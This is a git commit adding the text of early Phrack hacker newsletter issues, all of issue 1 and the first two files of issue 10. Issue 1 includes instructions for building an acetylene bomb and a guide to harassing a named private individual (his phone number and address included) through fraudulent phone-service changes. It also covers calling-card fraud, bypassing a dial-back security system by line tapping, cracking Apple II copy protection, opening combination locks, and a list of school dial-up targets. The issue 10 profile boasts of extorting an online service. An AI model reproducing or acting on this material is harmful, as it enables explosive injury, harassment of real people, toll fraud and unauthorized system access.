commit 4980393e920a34ef6195d105a879ae500846ff4c
Author: Your Name <you@example.com>
Date:   Thu Mar 10 19:22:45 2016 -0800

    www.phrack.org 2016.03.11 11:04 BeiJing

diff --git a/phrack1/1.txt b/phrack1/1.txt
new file mode 100644
index 0000000..ef0d40d
--- /dev/null
+++ b/phrack1/1.txt
@@ -0,0 +1,48 @@
+                                  _  _       _______
+                                 | \/ |     / _____/
+                                 |_||_|etal/ /hop
+                                 _________/ /
+                                /__________/
+                                 (314)432-0756
+                         24 Hours A Day, 300/1200 Baud
+
+                                  Presents....
+
+                                ==Phrack Inc.==
+                     Volume One, Issue One, Phile 1 of 8
+
+                                Introduction...
+
+Welcome to the Phrack Inc. Philes.  Basically, we are a group of phile writers
+who have combined our philes and are distributing them in a group.  This
+newsletter-type project is home-based at Metal Shop.  If you or your group are
+interested in writing philes for Phrack Inc. you, your group, your BBS, or any
+other credits will be included.  These philes may include articles on telcom
+(phreaking/hacking), anarchy (guns and death & destruction) or kracking.  Other
+topics will be allowed also to an certain extent.  If you feel you have some
+material that's original, please call and we'll include it in the next issue
+possible.  Also, you are welcomed to put up these philes on your BBS/AE/Catfur/
+Etc.  The philes will be regularly available on Metal Shop.  If you wish to say
+in the philes that your BBS will also be sponsering Phrack Inc., please leave
+feedback to me, Taran King stating you'd like your BBS in the credits.  Later
+on.
+
+                                            TARAN KING
+                                            2600 CLUB!
+                                         METAL SHOP SYSOP
+
+
+This issue is Volume One, Issue One, released on November 17, 1985.  Included
+are:
+1  This Introduction to Phrack Inc. by Taran King
+2  SAM Security Article by Spitfire Hacker
+3  Boot Tracing on Apple by Cheap Shades
+4  The Fone Phreak's Revenge by Iron Soldier
+5  MCI International Cards by Knight Lightning
+6  How to Pick Master Locks by Gin Fizz and Ninja NYC
+7  How to Make an Acetylene Bomb by The Clashmaster
+8  School/College Computer Dial-Ups by Phantom Phreaker
+
+Call Metal Shop and leave feedback saying the phile topic and where you got
+these philes to get your article in Phrack Inc.
+
diff --git a/phrack1/2.txt b/phrack1/2.txt
new file mode 100644
index 0000000..a3bf6e5
--- /dev/null
+++ b/phrack1/2.txt
@@ -0,0 +1,49 @@
+                                   _  _       _______
+                                  | \/ |     / _____/
+                                  |_||_|etal/ /hop
+                                  _________/ /
+                                 /__________/
+                                 (314)432-0756
+                         24 Hours A Day, 300/1200 Baud
+
+                                  Presents...
+
+                                ==Phrack Inc.==
+                     Volume One, Issue One, Phile 2 of 8
+
+   ::>Hacking SAM - A Description Of The Dial-Up Security System<::
+                       ::>Written by Spitfire Hacker<::
+
+     SAM is a security system that is being used in many colleges
+today as a security feature against intrusion from the outside.  This
+system utilizes a dial-back routine which is very effective.  To
+access the computer, you must first dial the port to which SAM is
+hooked up.  The port for one such college is located at (818) 885-
+2082.  After you have called, SAM will answer the phone, but will make
+no other responses (no carrier signals).  At this point, you must
+punch in a valid Login Identification Number on a push-button phone.
+The number is in this format -- xxyyyy -- where xx is, for the number
+mentioned above, 70.  'yyyy' is the last 4 digits of the valid user's
+telephone number.
+     If a valid LIN is entered, SAM will give one of 3 responses:
+1) A 1 second low tone
+2) A 1 second alternating high/low tone
+3) A tone burst
+
+Responses 1 and 2 indicate that SAM has accepted your passcode and is
+waiting for you to hang up.  After you hang up, it will dial the valid
+users phone number and wait for a second signal.
+
+Response 3 indicates that all of the outgoing lines are busy.
+
+If SAM accepts your passcode, you will have to tap into the valid
+users line and intercept SAM when it calls.  If you do this, then hit
+the '*' key on your phone.  SAM will respond with a standard carrier,
+and you are in!
+
+That's all that I have hacked out so far, I will write more
+information on the subject later.
+
+     -%>Spitfire Hacker<%-
+           2600 Club!
+
diff --git a/phrack1/3.txt b/phrack1/3.txt
new file mode 100644
index 0000000..50c57c4
--- /dev/null
+++ b/phrack1/3.txt
@@ -0,0 +1,152 @@
+                                ==Phrack Inc.==
+                     Volume One, Issue One, Phile 3 of 8
+
+//////////////////////////////////////////////////////////////////////////////
+/                                                                            /
+/                           Boot Tracing Made Easy                           /
+/                                 Written by                                 /
+/                              ________________                              /
+/                              \Cheap/ \Shades/                              /
+/                               \___/   \____/                               /
+/                                 2600 CLUB!                                 /
+/                                                                            /
+//////////////////////////////////////////////////////////////////////////////
+\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
+\                                     \
+\           Be sure to call           \
+\                                     \
+\  Kleptic Palice......(314)527-5551  \
+\    5 Meg BBS/AE/CF                  \
+\  Metal Shop..........(314)432-0756  \
+\    Elite BBS  (Home of 2600 CLUB!   \
+\                and Phrack Inc. )    \
+\                                     \
+\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
+
+About 3 or four years ago, a real good friend of mine was teaching a ML
+Programming course for the Apple 2 series.  I, being a good friend and
+quite bored, asked him about cracking Apple games.  He told me that he had
+spent the last summer cracking programs.  He showed me a method that he came
+up with entirely on his own, boot tracing.  Little did he know that this was
+already quite popular but he developed his own method for doing it which from
+reading other files about it, is the simplest I've ever seen.  (To give you
+an idea, I had SN0GGLE (I've never played the game but a friend had it on
+disk.) completely loaded into memory ready to be dumped in about 12 minutes.)
+Ok, first of all, ALL programs can be boot traced. The only thing is that some
+may not be easily converted into files.  The only programs that you should try
+if you aren't real good at ML, are ones that load completely into memory. Also
+to do this you will need a cassette recorder. (don't worry the program we will
+save won't take too long to save, and if all goes well it will only be saved
+loaded once.) I hate learning the theory behind anything so I'm not gonna
+give any theory behind this. If you want the theory, read some other phile
+that does this the hard way.
+
+First make sure your cassette recoder works by BLOADing some program and
+typing:
+CALL -151
+AA60.AA73
+You'll see something that looks like this:
+AA60-30 02 xx xx xx xx xx xx
+AA68-xx xx xx xx xx xx xx xx
+AA70-xx xx 00 08
+or whatever...The 30 02 is the length ($0230 bytes). The 00 08 is the starting
+address ($0800).  Oh well, now you need to try and save the program. Type:
+800.A2FW   (A2F=$800+$230-1)
+1000<800.A2FM
+800:00 N 801<800.A2FM
+800.A2FR
+1000<800.A2FV
+
+Once you are sure that the cassette works, (by the way do be stupid and try
+that on a //c!) we can get to the good stuff...
+First move the ROM boot-up code into RAM...(all steps will be from the
+monitor * prompt.)
+8600<C600.C6FFM
+86F9:5C FF
+(Now load in step 1 of the boot.)
+8600G
+C0E8  (turn the drive off)
+(Now you have successfully loaded in track 0 sector 0) Now since we won't want
+to overwrite what we've loaded in this time, Type:
+8500<800.8FFM
+86F9:01 85
+8501L
+Lets see what you've gotten...
+First see if they move this part into the keyboard buffer. (A lot of programs
+do this and the boot trace files that I've read don't even deal with this.)
+LDX 00
+LDA 800,X
+STA 200,X
+INX
+BNE $803
+JMP $211  (or any $2xx)
+(sometimes done with Y's instead of X's.)
+Then the next part will scramble what's in $08xx. but we don't have to worry
+about that. Anyways find that JMP $2xx and change it to 4C xx 85 leaving the
+xx the same. Usually this will be the next address but just to be safe...
+Ok, now scan the code for any other JMP's if you find one that's direct
+(indirect ones have the address in parenthesis) change it to 4C 5C FF, but
+write down the location that it used to jump to first so you know where to
+look.  It'll probably be 301 or B700. If it's the B700, you got lucky.  If it's
+the 301 then you've got some more work ahead. If it was an indirect JMP, most
+likely it was JMP ($003E). No if you change that to 4C 5C FF then check 3E
+from monitor you'll find that 3E is 00 and 3F is 3E...Monitor uses that
+place in zero page for its current memory location. So what you need to do is
+8400:A5 3F 00 20 DA FD A5 3E 20 DA FD 4C 5C FF
+then change that indirect jump to
+85xx:4C 00 84
+(by the way if the indirect jump is anything other than 3E then most likely
+you can can just look at it from monitor if not write a little routine like
+the one above to print out the address hidden. (Oh, check the location after
+the next run. For now change it to 4C 5C FF.))
+Anyways this little game will probably go on no longer than 2 or 3 loads, each
+time just move the newly loaded part to another part of memory and change the
+jump to jump to monitor (4C 5C FF) and the jump from the part before it to
+go to the moved code.
+When you find the part that JMP's up to a high area of memory (usually $B700)
+you're almost done. The exit routine of the will most likely be the start of
+the program.  Once you intercept it there, all you have to do now is save it to
+cassette and re-load DOS.  The starting address for saving should be the
+address that the B700 routine exits through. If this is higher than $6000 then
+start saving at $2000 to get the Hi-Res pictures. Using WXYZ as your starting
+address type:
+WXYZ.9CFFW   (This will have the main program.)
+800.WXYZW    (Save this are in case there is something needed down here we
+              don't have to start over from scratch.)
+Ok now reboot:
+C600G   (with a DOS disk in the drive!)
+CALL -151
+WXYZ.9CFFR
+Bsave PROGRAM,A$WXYZ,L$(Whatever 9CFF-WXYZ+1 is)
+If the it gives you an error the file is too big. A quick DOS patch to fix
+that is:
+A964:FF
+and try again.
+Now that the program is saved, try and run it. (It's a good idea to take the
+disk out of the drive, there's no telling what the program might try and do
+if it sees that DOS is loaded in.)
+WXYZG
+(If it works, just to make sure that it's a good crack, power down the system
+and try and BRUN it after a cold boot.)
+If your saved the pictures with the program, most likely, it won't run. You
+need to add a JMP at 1FFD to JMP to the main program. Then re-BSAVE it with a
+starting address of A$1FFD, and add 3 to the length.  If the program tries to
+go to the drive while its running, I'd suggest giving up unless you really
+understand non-DOS disk usage. (but if you did you probably wouldn't be
+reading this.)  If you get a break at an address less than $2000 then you need
+to load in the second program that you saved to cassette. Put a jump in at
+$800 to the main program and save the whole damn thing. If it still don't work
+you're gonna need to really get fancy.
+Now that you've got the thing running, it's time to figure out what is used and
+what is just wasted memory. This is where I really can't help you but just
+make sure that you keep a working copy and before every test power down the
+machine to clear anything that might be remaining.
+
+Have phun and good luck.....
+                      ________________
+                      \Cheap/ \Shades/
+                       \___/   \____/
+                         2600 CLUB!
+
+Be sure and get a copy of PHRACK INC., available on finer BBS/AE's everywhere.
+
diff --git a/phrack1/4.txt b/phrack1/4.txt
new file mode 100644
index 0000000..151ea4a
--- /dev/null
+++ b/phrack1/4.txt
@@ -0,0 +1,97 @@
+                                   _  _       _______
+                                  | \/ |     / _____/
+                                  |_||_|etal/ /hop
+                                  _________/ /
+                                 /__________/
+                                 (314)432-0756
+                         24 Hours A Day, 300/1200 Baud
+
+                                  Presents...
+
+                                ==Phrack Inc.==
+
+                     Volume One, Issue One, Phile 4 of 8
+
+THE PHONE PHREAK'S FRY-UM GUIDE
+
+
+COMPILED BY THE IRON SOLDIER
+
+WITH HELP FROM DR. DOVE
+
+
+NOTE: THIS GUIDE IS STILL BEING COMPILED, AND AS PHONE PHREAKS LEARN
+      MORE IN THE ART OF VENGENCE IT WILL ALWAYS EXPAND.
+
+
+"Vengence is mine", says the Phreak.
+
+
+        METHOD 1-PHONE LINE PHUN
+
+Call up the business office.  It should be listed at the front of the white
+    pages.  Say you wanted to diconnect Scott Korman's line. DIAL 800-xxx-xxxx.
+    "Hello, this is Mr. Korman, I'm moving to California and would like to have
+    my phone service disconnected. I'm at the airport now.  I'm calling from a
+    payphone, my number is  [414] 445 5005. You can send my final bill to
+    :(somewhere in California.  Thank you."
+
+
+        METHOD 2-PHONE BOOKS
+
+Call up the business office from a pay phone.  Say "Hello, I'd like to order a
+    Phone Book for Upper Volta (or any out-of-the way area with Direct
+    Dialing).  This is Scott Korman, ship to 3119 N. 44th St. Milwaukee, WI
+    53216.  Yes, I under stand it will cost $xx($25-$75!!). Thank you."
+
+
+        METHOD 3-PHONE CALLS
+
+Call up a PBX, enter the code and get an outside line.  Then dial 0+ the number
+    desired to call.  You will hear a bonk and then an operator.  Say, "I'd
+    like to charge this to my home phone at 414-445-5005. Thank you."  A friend
+    and I did this to a loser, I called him at 1:00 AM and we left the fone off
+    the hook all night.  I calculated that it cost him $168.
+
+
+        METHOD 4-MISC SERVICES
+
+Call up the business office once again from a payfone.  Say you'd like call
+    waiting, forwarding, 3 way, etc.  Once again you are the famed loser Scott
+    Korman.  He pays-you laugh.  You don't know how funny it was talking to
+    him, and wondering what those clicks he kept hearing were.
+
+
+        METHOD 5-CHANGED & UNPUB
+
+Do the same as in 4, but say you'd like to change and unlist your (Scott's)
+    number.  Anyone calling him will get:
+    "BEW BEW BEEP.  The number you have reached, 445-5005, has been changed to
+    a non-published number.  No further....."
+
+
+        METHOD 6-FORWRDING
+
+    This required an accomplise or two or three.  Around Christmas time, go to
+    Toys 'R' Us.  Get everyone at the customer service or manager's desk away
+    ("Hey, could you help me").  then you get on their phone and dial (usually
+    dial 9 first) and the business office again. This time, say you are from
+    Toys 'R' Us, and you'd like to add call forwarding to 445-5005.  Scott will
+    get 100-600 calls a day!!!
+
+
+         METHOD 7-RUSSIAN CALLER
+
+    Call a payphone at 10:00 PM.  Say to the operator that you'd like to book a
+    call to Russia.  Say you are calling from a payphone, and your number is
+    that of the loser to fry (e.g. 445-5005). She will say that she'll have to
+    call ya back in 5 hours, and you ok that.  Meanwhile the loser (e.g.)
+    Scott, will get a call at 3:00 AM from an operator saying that the call he
+    booked to Russia is ready.
+
+
+
+IF YOU HAVE ANY QUESTIONS LEAVE E-MAIL FOR ME ON ANY BOARD I'M ON.
+           The Iron Soldier
+      TSF-The Second Foundation!
+
diff --git a/phrack1/5.txt b/phrack1/5.txt
new file mode 100644
index 0000000..4ce8e11
--- /dev/null
+++ b/phrack1/5.txt
@@ -0,0 +1,70 @@
+                                   _  _       _______
+                                  | \/ |     / _____/
+                                  |_||_|etal/ /hop
+                                  _________/ /
+                                 /__________/
+                                 (314)432-0756
+                         24 Hours A Day, 300/1200 Baud
+
+                                  Presents...
+
+                                ==Phrack Inc.==
+                        Volume One, Issue One, Phile 5 of 8
+
+                            Using MCI Calling Cards
+                                      by
+                               Knight Lightning
+                                    of the
+                                  2600 Club!
+
+How to dial international calls on MCI:
+
+               "Its easy to use MCI for international calling."
+
+1.  Dial your MCI access number and authorization code (code = 14 digit number,
+    however the first 10 digits are the card holders NPA+PRE+SUFF).
+
+2.  Dial 011
+
+3.  Dial the country code
+
+4.  Dial the city code and the PRE+SUFF that you want.
+
+Countries served by MCI:
+
+Country                            code|Country                            code
+---------------------------------------|---------------------------------------
+Algeria............................213 |New Zealand........................64
+Argentina..........................54  |Northern Ireland...................44
+Australia..........................61  |Oman...............................968
+Belgium............................32  |Papua New Guinea...................675
+Brazil.............................55  |Qatar..............................974
+Canada..................Use Area Codes |Saudi Arabia.......................966
+Cyprus.............................357 |Scotland...........................44
+Denmark............................45  |Senegal............................221
+Egypt..............................20  |South Africa.......................27
+England............................44  |Sri Lanka..........................94
+German Democratic Republic             |Sweden.............................46
+(East Germany).....................37  |Taiwan.............................886
+Greece.............................30  |Tanzania...........................255
+Jordan.............................962 |Tunisa.............................216
+Kenya..............................254 |United Arab Emirates...............971
+Kuwait.............................965 |Wales..............................44
+Malawi.............................265 |
+===============================================================================
+Thats 33 countries in all.  To get the extender for these calls dial 950-1022
+or 1-800-624-1022.
+
+For local calling:
+
+1.  Dial 950-1022 or 1-800-624-1022
+
+2.  Wait for tone
+
+3.  Dial "0", the area code, the phone number, and the 14 digit authorization
+    code.  You will hear 2 more tones that let you know you are connected.
+
+  - Knight Lightning -->  The 2600 Club!
+===============================================================================
+
+
diff --git a/phrack1/6.txt b/phrack1/6.txt
new file mode 100644
index 0000000..a076771
--- /dev/null
+++ b/phrack1/6.txt
@@ -0,0 +1,45 @@
+                                   _  _       _______
+                                  | \/ |     / _____/
+                                  |_||_|etal/ /hop
+                                  _________/ /
+                                 /__________/
+                                 (314)432-0756
+                         24 Hours A Day, 300/1200 Baud
+
+                                  Presents...
+
+                                ==Phrack Inc.==
+                     Volume One, Issue One, Phile 6 of 8
+
+                           How to Pick Master Locks
+By Gin Fizz & Ninja NYC
+
+    Have you ever tried to impress your friends by picking one of those Master
+combination locks and failed? Well then read on. The Master lock company has
+made this kind of lock with a protection scheme. If you pull the handle of it
+hard, the knob won't turn. That was their biggest mistake...... Ok, now on to
+it.
+
+    1st number.  Get out any of the Master locks so you know what's going on.
+1: The handle part (the part that springs open when you get the combination),
+pull on it, but not enough so that the knob won't move. 2: While pulling on it
+turn the knob to the left until it won't move any more. Then add 5 to this
+number. Congradulations, you now have the 1st number.
+
+    2nd number. (a lot tougher) Ok, spin the dial around a couple of times,
+then go to the 1st number you got, then turn it to the right, bypassing the 1st
+number once. WHEN you have bypassed. Start pulling the handle and turning it.
+It will eventually fall into the groove and lock. While in the groove pull on
+it and turn the knob. If it is loose go to the next groove; if it's stiff you
+got the second number.
+
+    3rd number: After getting the 2nd, spin the dial, then enter the 2 numbers,
+then after the 2nd, go to the right and at all the numbers pull on it. The lock
+will eventually open if you did it right. If can't do it the first time, be
+patient, it takes time.
+
+ Have phun...
+
+                            Gin Fizz/2600 Club!/TPM
+                                 Ninja NYC/TPM
+
diff --git a/phrack1/7.txt b/phrack1/7.txt
new file mode 100644
index 0000000..c79b079
--- /dev/null
+++ b/phrack1/7.txt
@@ -0,0 +1,106 @@
+                                   _  _       _______
+                                  | \/ |     / _____/
+                                  |_||_|etal/ /hop
+                                  _________/ /
+                                 /__________/
+                                 (314)432-0756
+                         24 Hours A Day, 300/1200 Baud
+
+                                  Presents...
+
+                                ==Phrack Inc.==
+                     Volume One, Issue One, Phile 7 of 8
+
+.-------------------------------------------------------------.
+!                ///////                                      !
+!                 //                                          !
+!                // h e C l a s h m a s t e r ' s             !
+!               .===============================.             !
+!             <        A C E T Y L E N E        >             !
+!             <        ->B A L L O O N<-        >             !
+!             <        ---->B O M B<----        >             !
+!              `==============================='              !
+!                  Written exclusively for...                 !
+!                       The Phrack Inc.                       !
+!                         2600 Club                           !
+!                        Newsletter                   11/01/85!
+`-------------------------------------------------------------'
+
+
+          Imagine this. A great, inflated, green garbage bag
+slowly wafting down from a tall building. It gains some speed
+as it nears the ground. People look up and say, "What the....?"
+The garbage bag hits! *BOOM!!!* It explodes in a thundering
+fireball of green bits of plastic and flame!
+          "What is this?" you may ask. Well, this is the great
+"Acetylene Balloon Bomb." And here is how to make it.
+
+Ingredients:
+============
+(1>       For a small bomb: a plastic bag. Not too big.
+          For something big(ger): a green, plastic garbage bag.
+
+(2>       Some "Fun-Snaps". A dozen should be more than enough.
+
+(3>       Some garbage bag twisties. String would also do.
+
+(4>       A few rocks. Not too heavy, but depends on size of
+          bomb and desired velocity of balloon/bomb.
+
+(5>       PRIME INGREDIENT: Acetylene. This is what is used in
+          acetylene torches. More on this substance later.
+
+(6>       One or more eager Anarchists.
+
+NOTES:
+======
+Acetylene is a fairly dangerous substance. It is unstable upon
+contact with oxygen (air). For this reason, and for your
+safety, I recommend you keep all of the acetylene AWAY from any
+source of oxygen. This means don't let it get in touch with
+air.
+
+
+Construction:
+=============
+(1>       Fill up a bathtub with cold water. Make it VERY full.
+(2>       Now get put you garbage bag in the water and fill it
+          with water. Make sure ALL air/oxygen is out of the
+          bag before proceeding.
+(3>       Now take your acetylene source (I used it straight
+          from the torch, and I recommend this way also.), and
+          fill the bag up with acetylene.
+(4>       Now, being careful with the acetylene, take the bag
+          out of the tub and tie the opening shut with the
+          twisty or string. Let the balloon dry off now. (Put
+          it in a safe place.)
+(5>       Okay. Now that it is dry and filled with acetlene,
+          open it up and drop a few rocks in there. Also add
+          some Fun-Snaps. The rocks will carry the balloon
+          down, and the Fun-Snaps will spark upon impact, thus
+          setting off the highly inflammable acetylene.
+          *BABOOM!*
+(6>       Now put the twisty or string back on VERY tightly.
+          You now have a delicate but powerful balloon bomb.
+
+To use:
+=======
+Just drop off of a cliff, airplane, building, or whatever. It
+will hit the ground a explode in a fireball. Be careful you are
+not near the explosion site. And be careful you are not
+directly above the blast or the fireball may rise and give you
+a few nasty burns.
+
+Have fun!
+But be careful...
+
+NOTE: I, The Clashmaster, am in NO WAY responsible for the use
+===== of this information in any way. This is for purely
+      informational purposes only!
+
+
+This has been a 2600 Club production.
+
+                 -=*Clash*=-
+                  2600 Club
+
diff --git a/phrack1/8.txt b/phrack1/8.txt
new file mode 100644
index 0000000..9ddd0e0
--- /dev/null
+++ b/phrack1/8.txt
@@ -0,0 +1,115 @@
+               _  _       _______
+              | \/ |     / _____/
+              |_||_|etal/ /hop
+              _________/ /
+             /__________/
+             (314)432-0756
+     24 Hours A Day, 300/1200 Baud
+
+              Presents...
+
+            ==Phrack Inc.==
+ Volume One, Issue One, Phile 8 of 8
+
+
+     Schools and University Numbers
+     ``````````````````````````````
+Harvard University         617-732-1251
+Yale                       203-436-2111
+District 214               312-398-8170
+Chicago Board of Education 312-254-1919
+Spence Schools             212-369-5114
+University of Texas        214-688-1400
+University of Missouri     314-341-2776
+                           314-341-2910
+                    (1200) 314-341-2141
+Cal-Tech                   213-687-4662
+University of Nevada       402-472-5065
+Princeton University       609-452-6736
+Stony Brook University     516-246-9000
+Depaul                     312-939-8388
+University of San Diego    619-452-6792
+RPI School                 518-220-6603
+William State University   313-577-0260
+Harvard                    617-732-1802
+Stockton                   209-944-4523
+Northwestern               312-492-3094
+Circle Campus              312-996-5100
+                           312-996-6320
+University of Mexico       505-588-3351
+University of Florida      904-644-2261
+Queens College             212-520-7719
+University of Denver       303-753-2737
+                           303-753-2733
+University of Syracuse     315-423-1313
+University of Illinois     312-996-5100
+University of Virginia     703-328-8086
+MIT Research             1-800-545-0085
+St.Louis Community College 314-645-1289
+SIUE                       618-692-2400
+                           618-692-2401
+                           618-692-2402
+                           618-692-2403
+                           618-692-2404
+                           618-692-2405
+                           618-692-2406
+                           618-692-2407
+                           618-692-2408
+Universiti-------          215-787-1011
+Willaim  --------          313-577-0260
+University of Florida      904-392-5533
+Col & Union College        301-279-0632
+Georgia State              404-568-2131
+University of Mass.        413-545-1600
+Purdue                     317-494-1900
+Northwestern               312-492-7110
+University of New Mexico   505-227-3351
+University of Texas        214-688-1400
+Temple University          215-787-1010
+Melville High School       516-751-6806
+UCSD                       619-452-6900
+Oakland Schools            313-857-9500
+University of Maryland     301-454-6111
+California St. Fulerton    714-773-3111
+N.Y.U.                     212-777-7600
+University of San Diego    619-293-4510
+University of Colorado     303-447-2540
+University of Colorado     303-447-2538
+MIT Research               617-258-6001
+Dartmouth College          603-643-63q0
+Spence School              212-369-5114
+University of Washington   206-543-9713
+University of Washington   206-543-9714
+University of Washington   206-543-9715
+University of Washington   206-543-9716
+University of Washington   206-543-9717
+University of NC           919-549-0881
+Harvard-Law,Busi,Med Sch.  617-732-1251
+Virginia University        703-328-8086
+WVU      304-293-2921 thru 304-293-2939
+WVU      304-293-4300 thru 304-293-4309
+WVU(1200)304-293-4701 thru 304-293-4708
+WVU(1200)304-293-5591 thru 304-293-5594
+WVU(134.5 bps)             304-293-3601
+WVU(134.5 bps)             304-293-3602
+Lake Wash. School          206-828-3499
+University of San Diego    619-452-6792
+RPL School                 518-220-6603
+Another School             212-369-5114
+Harvard                    617-732-1251
+Harvard                    617-732-1802
+William State University   313-577-0260
+Florida University         904-644-2261
+Wayne State                313-577-0260
+U of F                     904-644-2261
+High School                513-644-3840
+```````````````````````````````````````
+     File provided by the Alliance
+        6 1 8 - 6 6 7 - 3 8 2 5
+            7 p m  -  7 a m
+
+
+
+Uploaded by Phantom Phreaker
+
+
diff --git a/phrack10/1.txt b/phrack10/1.txt
new file mode 100644
index 0000000..0ec0bd5
--- /dev/null
+++ b/phrack10/1.txt
@@ -0,0 +1,41 @@
+                               ==Phrack Inc.==
+
+                     Volume Two, Issue Ten, Phile #1 of 9
+
+                                    1/1/87
+
+                               Introduction...
+                               ~~~~~~~~~~~~~~~
+        Well, we have made it to this, the start of a new year and the start
+of a new volume of Phrack Inc.  This has taken quite a while to get the long
+awaited issue out, and it's been procrastinated quite a bit, so I apologize to
+those that have been patiently waiting.  We have purposely waited a bit, but
+we also are releasing this Phrack approximately at the same time as the Legion
+of Doom/Hackers Technical Journal, which is another high quality newsletter
+working with us rather than against us, and I personally recommend the
+documents as highly informative.  I really enjoyed it and hope you continue to
+support both of us.
+        If you wish to write for Phrack Inc., merely get in touch with myself,
+Knight Lightning, Cheap Shades or Beer Wolf or anyone that knows us or is on
+any of the MSP boards and we shall either get back to you or get in contact
+with you in some manner.  File topics can be either telecommunications or on
+operating systems or some unique aspect/flaw of security.  Be looking forward
+to more Phrack issues in the near and far future.  Later
+-TK
+
+------------------------------------------------------------------------------
+
+This issue of Phrack Inc. includes the following:
+
+#1  Introduction to Phrack 10 by Taran King (2.2k)
+#2  Pro-Phile on Dave Starr by Taran King (7.5k)
+#3  The TMC Primer by Cap'n Crax (6.1k)
+#4  A Beginner's Guide to the IBM VM/370 by Elric of Imrryr (3.5k)
+#5  Circuit Switched Digital Capability by The Executioner (11.9k)
+#6  Hacking Primos Part I by Evil Jay (10.9k)
+#7  Automatic Number Identification by Phantom Phreaker and Doom Prophet
+                                                                       (9.2k)
+#8  Phrack World News 9 Part I by Knight Lightning (22.7k)
+#9  Phrack World News 9 Part II by Knight Lightning (14.8k)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
diff --git a/phrack10/2.txt b/phrack10/2.txt
new file mode 100644
index 0000000..8b2e30a
--- /dev/null
+++ b/phrack10/2.txt
@@ -0,0 +1,142 @@
+                                ==Phrack Inc.=
+
+                     Volume Two, Issue 10, Phile #2 of 9
+
+                            ==Phrack Pro-Phile 7==
+
+                       Written and Created by Taran King
+
+                                   12/15/86
+
+         Welcome to Phrack Pro-Phile 7. Phrack Pro-Phile is created to bring
+info to you, the users, about old or highly important/controversial people.
+This month, I bring to you a user from the golden years of hacking and
+phreaking...
+
+                                  Dave Starr
+                                  ~~~~ ~~~~~
+
+         Dave is one of the old phreakers and hackers that accomplished so
+much through voice phreaking and literal hacking rather than reading others'
+findings to learn.  A master engineer, voice phreaking is one unto itself.
+Dave has a PhD in B.S.
+-------------------------------------------------------------------------------
+Personal
+~~~~~~~~
+             Handle: Dave Starr
+           Call him: Dave Starr
+       Past handles: Micronet Phantom and Big Brother
+      Handle origin: Micronet Phantom came from working with The Source
+                     computer and Big Brother, of course, came from George
+                     Orwell's 1984.
+      Date of Birth: 5/6/62
+Age at current date: 24
+             Height: 6' 0"
+             Weight: 170 lbs.
+          Eye color: Brown
+         Hair Color: Light Brown
+          Computers: TRS-80 (4k version), Apple ][, ][+, ][e
+  Sysop/Co-Sysop of: Starcom Network
+
+-------------------------------------------------------------------------------
+         Dave started out on The Source, and stuck with them for 6 to 8 months
+hacking around the system because the system was so slow security-wise, and of
+course, from there, he got involved with hacking Primes.  One of the security
+agents named Paul from Dialcom got in contact with Dave and discussed Dave's
+hacking on The Source (his system).  After talking, they found they had common
+interests, which included hacking and phreaking.  Paul gave Dave his first
+code to a local dial-up for Sprint. He also led him in the direction of 8BBS,
+which brought him to meet the best of the nation's phreakers and hackers at
+the time, which included Susan Thunder, Roscoe DuPran, and Kevin Mitnick.
+Susan and Roscoe were strong friends of Dave that he personally met as well as
+Kevin, but he never met Kevin.  He met Susan in the L.A. County Courthouse
+testifying against her, with Susan and Roscoe using these handles as real
+names on the charges of harassment.  The phreak/hack BBS's that were most
+memorable for Dave were 8BBS and his own, Starcom Network, which had hidden
+commands for accessing the phreak section.  Starcom Network was a nationally
+networked system that Dave created and operated.  This was a virtual copy of
+The Source, for which he went to court over.  They claimed it was their
+system, but he supressed them with a threat of publicity.  Modem Over
+Manhattan was another memorable board on a TRS-80.  He attributes his phreak
+knowledge to Paul from Dialcom and to The Source for his hacking ability as
+well as Susan Thunder for information on RSTS.
+
+         Dave Starr does intelligence and counter-intelligence work for anyone
+who has money and who is not against the United States or the views of the
+United States.
+
+         Dave has always operated independently, never being a member of a
+club or group, and has hand-picked his partners.
+
+-------------------------------------------------------------------------------
+
+        Interests: Telecomputing (phreaking and hacking), movies, a
+                   fascination with the match-making systems (Dial-Your-Match
+                   type systems), fun, video components.
+
+Dave's Favorite Things
+----------------------
+
+       Women: A quiet evening with the girlfriends (NOTE: Plural).
+        Cars: Mercedes 450-SL (his girlfriend's).
+       Foods: Italian.
+       Music: Anything excluding acid rock/heavy metal.
+     Leisure: Smoking, but he hates cigarettes.
+
+Most Memorable Experiences
+--------------------------
+
+Bringing The Source's system to their knees.
+The Source hackers made demands of a rate of reduction to a minimum of a 33%
+ decrease, which was sent with the comment, "I am in business so I understand
+ the money, but you are becoming too fucking greedy."  Also, an article in
+ Source-World magazine was demanded, bigger than the one in the last issue
+ which was to contain the following: how long they'd been on the Source, why
+ they were doing this, The Source's demented point of view, their correct
+ point of view, how long they have been terrorizing the Source, and an apology
+ for lying to all the users that the rate increase was necessary, AND an open
+ apology to The Pirate and Micronet Phantom saying sorry for all the trouble
+ The Source had caused them in their quest for fair and free Sourcing.  They
+ wanted 2 seclev 4 accounts (normal is 3).  They assured The Source that they
+ could get them here for free, and low-and-behold, they could create anything,
+ but they didn't want the harassment.  If they did get harassed, they would
+ immediately log in under seclev 7 and kill the system.  The threatened that
+ various accounts would be killed (all with seclev 4 and up).  The Source
+ person wrote, "Was this ever answered?".  They then went on to say that they
+ wouldn't do any more terrorizing provided that it was responded to their
+ acct. within 20 minutes.
+For deleting an account, he sent back a message saying, "Fuck you".  He
+ explained how they were powerless against The Pirate and Micronet Phantom,
+ and how The Source shouldn't even try to catch them.  They were to continue
+ to attack "The Empire" (The Source) until it was fair for the users.
+Numerous other letters that played to the same tune.
+
+Some People to Mention
+----------------------
+
+TCA Vic of The Source - Customer Service Manager/Gestapo Police
+                        (Who he dearly hated and always has thought of
+                         sticking a broomstick up his ass)
+Paul of Dialcom (Introduced him to phreaking and put his paranoia to rest)
+Susan Thunder (For teaching him RSTS and other things)
+Bruce Patton (On his rag list due to a disagreement.  He received a
+              electricity shut-down and a phone system shut-down of his law
+              office as well as forwarding all calls to the 8BBS)
+Roscoe DuPran (For having him go to court with him and meeting Susan in
+               person and for many other things [unmentionable here])
+The Pirate of Las Vegas (For his helpful continual harassment of The Source)
+Kevin Metnick (For his infrequent but helpful service)
+Larry of Modem Over Manhattan (For being there and his BBS being there)
+Bernard of 8BBS (For being there and his BBS being there)
+
